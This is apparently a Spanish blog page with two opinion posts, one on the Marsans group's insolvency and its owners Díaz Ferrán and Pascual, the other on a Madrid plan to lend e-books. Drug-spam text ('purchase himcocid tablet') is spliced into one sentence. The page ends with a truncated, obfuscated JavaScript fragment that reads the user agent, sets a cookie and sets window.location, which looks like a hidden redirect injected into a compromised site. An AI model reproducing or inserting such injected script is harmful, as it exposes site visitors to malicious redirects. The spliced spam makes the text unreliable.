Economía reclama 30,65 millones a Díaz Fernán y Pascual
Cada vez hay más comercios cerrados en mi barrio y eso que en él habitan pensionistas de la llamada media clase alta. Ni pensar quiero de lo que estará sucediendo con los pequeños comercios de los barrios de pensionistas de la presunta media clase baja. El capital social acumulado durante años en mi ciudad está desmoronándose por la acumulación de basura que el Ayuntamiento no recoge y por las promesas incumplidas por el exceso de deuda municipal y autonómica, que unos y otros tienen competencias indebidas sobre los servicios públicos a la población. Hoy día, las Iglesias siguen tan casi vacías como siempre, pero ahora también lo están los bares al mediodía. Las únicas colas visibles son las del paro del INEM y las de los bancos para cobrar la pensión. Parece que, al final, sólo es fuese el dinero del Gobierno Central el que sostuviera la demanda interna. Porque los bancos, ahora en época de reparto de dividendos, siguen con la sequía del crédito por mor de que les descubran los balances paralelos donde tienen embalsada la morosidad disfrazada y donde se ocultan contablemente las pérdidas latentes de la tasación del activo en suelo urbanizable.
! Como me acuerdo de Roldán y de Matas y del caso Malaya! O de la estafa de los burgueses del Liceo. Todos ellos !qué listos fueron que ni siquiera han tenido que devolver el dinero evaporado con la ayuda de algún abogado listo disfrazado de economista!
Pero hoy, que ya está el catalán Rosell de presidente de la patronaly nos toca hablar de de la nueva vergüenza de la patronal descubierta gracias a otra nueva insolvencia de la pareja Ferrán&Pascual.
Lo que todavía me asombra es que esta pareja no haya desaparecido hacia el paraíso fiscal preparado durante tantos años que Ferrán presidió la patronal de patronales.
Todavía me asombra que El País no haya encontrado ningún documento del embajador norteamericano dirigido a Clinton en el que contase de las aventuras empresariales de los empresarios Pascual y Ferrán.
Más me admira todavía que ninguna agrupación sectorial de la CEOE hubiera detectado nada del agujero de impagos a proveedores del Grupo Marsans y eso que llegaron a ser, tal como se muestra en el Concurso , cerca de purchase himcocid tablet 1.400 Purchase las empresas afectadas y eso que los registros bancarios, del RAI y de ASNEF funcionan con la diligencia conocida por cuenta que les trae a la banca acreedora.
2º Que tanto la Agencia Tributaria como la Seguridad Social mirasen para otro lado una vez que PWC hubiese dado a conocer sus salvedades en la Auditoría 2009.
3ª Que el Gobierno hubiera seguido actualizando los avales de los créditos de la operación de Marsans en Aerolíneas Argentinas.
O que, en 4º lugar, Esperanza Aguirre hubiera prorrogado en agosto pasado, por 40 años más la concesión a Marsans de los autobuses urbanos de la periferia de Madrid. Este favor del Gobierno de la Comunidad Autónoma madrileña fue un activo precioso que sirvió como colateral para pagar gasto corriente del Grupo Marsans y, así, ganar el tiempo necesario ante el Concurso y el despido de esos 3.000 trabajadores que hoy tramitan sus salarios en el FOGASA que todos nosotros pagamos con nuestras cotizaciones sociales.
Esto es lo que se llama, en román paladino, una apropiación privada de los beneficios y una socialización de las pérdidas.
Como si estuviéramos en el franquismo todavía.
AL FINAL HABRA QUE JUBILARSE A LOS 67 AÑOS DE EDAD Y 41 DE COTIZACION.
Las Bibliotecas Públicas prestarán libros electrónicos
En este enlace que antecede pueden leer ustedes de una información que cuenta que alguien con poder suficiente pretende que hacer creer que las de bibliotecas públicas de Madrid van a prestar libros electrónicos a los ciudadanos inscritos en el servicio. De ser ello cierto , posible y verificable, el hecho representaría una revolución para la vida de muchos parados, jubilados, amas de casa expulsadas del mercado de trabajo y, cómo no, de todos aquellos jóvenes licenciados que quieren aprender alemán fácil para irse rápidamente de inmigrante a Berlín.
Pero a estas alturas y después de tantos años de subvenciones tiradas por el desagüe, alguien debería hacer reflexiones en voz alta. Ya sé que el periodo preelectoral está muy cercano pero cuando la sanidad pública local y autonómica están colapsadas y quebradas, ¿de donde van a sacar dinero Aguirre o Gallardón para autorizar un gasto corriente destinado al presunto ocio de un público salvaje medio como e el que conocemos bien existe en Madrid DF?. Por que subir impuestos no quieren y endeudarse ya no pueden. ¿Es estos hablan siempre a andanas? Pero, sobre todo, estos dos líderes políticos, ¿no tienen una mejor prelación? Seguro que Gallardón y Aguirre tienen expertos que podrían aconsejarles gastar en mejores costes/beneficios que el de prestar servicios de lectura electrónica para cualquier empadronado que entre por la puerta. A vuela pluma a Burdiel a Alarcón se le han ocurrido unos 300 mejores empleos para ese dinero. Pero hay más madera para una reflexión puramente pragmática; para un político nada hay más perjudicial que el efecto que tienen las promesas incumplidas en la memoria colectiva de los pueblos. Bien que lo va saber el PSOE de Zapatero en las próximas elecciones. Así que ¿nadie recuerda el fiasco que ha representado las carencias en la entrega de ordenadores de prestación media a los alumnos de los colegios públicos?
Y además, algunas preguntas rápidas sobre este concreto regalo preelectoral: ¿Alguien ha pensado en la horrible calidad y carísima prestación del ADSL de todas las operadoras, incluida la de Telefónica? ¿Alguien ha pensado en la reducida oferta de libros electrónicos disponibles en español? ¿Alguien ha pensado en las obligadas protestas que van a elevar los editores catalanes al Gobierno a través de Durán i Lleida? Y ¿qué podría pasar a los pocos libreros madrileños que todavía existen? Es sabido, por demostrado en varias ocasiones, que Esperanza Aguirre es bastante inculta y que Gallardón es todo lo contrario, por lo que una medida de prestar gratis los e-book podría terminar acrecentando la profundidad del odio sacarreno que se muestran esos dos políticos. Ello sería un ejemplo más de los llamados efectos no buscados de decisiones poco meditadas.
Fíjense como una decisión del tipo bondadoso como es la del prestar libros podría terminar produciendo un conflicto de intereses entre las diversas familias políticas en el próximo Gobierno del PP de Rajoy. Sería chusco ver a los conservadores aliarse con los democristianos para atacar a los liberales por mor de un préstamo de e-book en las bibliotecas públicas madrileñas. Sobre todo porque ello podría llegar a afectar a la edad a la que tendrían que jubilarse los jóvenes que hoy tienen 30 años para poder cobrar la pensión del 100% sin tener que haber acumulado 41 años de cotización. Y eso es harina de otro costal.
Fíjense. ¿Qué diría de ello el embajador norteamericano en el mensaje de la valija diplomática para Hilary Clinton? Pues divertirse viendo que el sucesor Rajoy podría resultar ser peor que el tarambaina Zapatero.
Así que, por todo lo anteriormente dicho, mejor es que no preste nada a nadie. Porque NADA ES GRATIS.
x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}